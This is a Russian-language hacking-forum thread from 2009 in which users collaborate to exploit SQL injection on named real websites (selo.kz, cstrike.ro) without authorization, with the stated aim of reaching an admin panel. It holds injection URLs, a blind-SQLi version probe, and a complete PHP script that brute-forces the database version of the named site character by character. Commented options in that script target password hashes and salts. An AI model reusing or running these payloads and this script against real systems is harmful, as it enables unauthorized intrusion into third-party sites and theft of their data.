ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.11.2009, 17:53
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
http://www.selo.kz/fspisok.php?id=-24+union+select+1--
Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
|
|
|
04.11.2009, 18:14
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Gemini12 я не искал но в указанном месте нет вывода ..так что крути как слепую..версия там 5.0.85-log
http://www.selo.kz/fspisok.php?id=24+AND+SUBSTRING((version()),1,1)=5--
|
|
|
|
04.11.2009, 18:58
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от Gemini12
http://www.selo.kz/fspisok.php?id=-24+union+select+1--
Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
сплоит, он конечно кривоват, но работать должен:
PHP код:
<?php
#$chars="abcdef0123456789"; // для хеша
#$chars="_.\\][)(:;!@#$%^&*-+='\"<>?/,}~{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789"; // для соли
$chars=".54367890012-ntlog"; // бд
$i=1;
$to=10;
$c=0;
$cc=0;
$data="";
$ebana="";
set_time_limit(0);
while($i<=$to) {
while($c<=strlen($chars)) {
echo $i.":".$chars[$c];
$sock=fsockopen("www.selo.kz", 80, $errno, $errstr, 5);
if(!$sock) die("hehe fuckin connect");
$ept="id=99999924+or+if(substring((select+version()),".$i.",1)=".$chars[$c].",(select+1+union+select+2),null)";
$h="POST /fspisok.php? HTTP/1.0\r\n";
$h.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$h.="Content-Type: application/x-www-form-urlencoded\r\n";
$h.="User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\n";
$h.="Host: www.selo.kz\r\n";
$h.="Content-Length: ".strlen($ept)."\r\n";
$h.="Cookie: bbsessionhash=636f59afa8e2b1a8519bbbf5669a48b6; bblastvisit=1242490434; bblastactivity=0\r\n\r\n";
$h.=$ept;
fwrite($sock, $h);
sleep(1);
$c++;
$data="";
while(!feof($sock)) {
$data=fgets($sock, 1024);
if(eregi("Subquery returns more than 1 row", $data)) { $cc=1; break; }
}
if($cc==1) { echo ":OKE!!1\r\n"; $ebana.=$chars[$c-1]; break; }
else echo ":FUCK!1\r\n";
fclose($sock);
}
$c=0;
$cc=0;
$i++;
}
echo $ebana;
?>
|
|
|
|
04.11.2009, 19:58
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Aртем я думаю что для таких дел как раскрутка слепой скули есть много програм например сипт..кототрый поверь мне не настолько кривоват как твой скрипт..если конечно это твой скрипт
|
|
|
|
04.11.2009, 20:04
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал.
А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.
|
|
|
|
04.11.2009, 20:12
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Aртем
Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал.
А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.
ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...
|
|
|
|
04.11.2009, 20:15
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от Gorev
ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...
Соотношение время-качество играет весомую роль. Зачастую нет времени делать качественно. Но здесь важно не качество, а результат, чего-бы это не стоило. 
|
|
|
|
04.11.2009, 20:29
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Aртем
если писать,то писать то что может конкурировать со скриптами выложенными в этой теме,а не лишь бы писать, где на перебор 1-го символа (не хеша где a-f0-9) - уходит 8 запросов (я взял пример Грея),в нем находится середина диапазона chr(0)-chr(255),и проверяется на истинность в зависимости от ответа - циклично ,ну это так,к слову.детальней это все описал Qwazar опять же thread119047.html
|
|
|
|
04.11.2009, 20:37
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
L I G A и Pashkela, я не в коем случае не пытался написать универсальный скрипт для посимвольного перебора и уж тем более набиваться в конкуренты. Я просто написал сплоит для посимвольного перебора, непосредственно основывая работу исходя из поста #9868 |
|
|
|
04.11.2009, 22:18
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Возник такой вопрос
Есть сайт
Код:
http://www.cstrike.ro/cs_1.6_servers.php?start=190
Ошибку выдёт только в таком случаи
Код:
http://www.cstrike.ro/cs_1.6_servers.php?start=-190
А так не хочет
Код:
http://www.cstrike.ro/cs_1.6_servers.php?start=190'
т.е. там как я понял, такая фильтрация
PHP код:
$start = (int)$_GET['start'];
Реально ли раскрутить такую SQl inj , если это вообще SQL inj |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
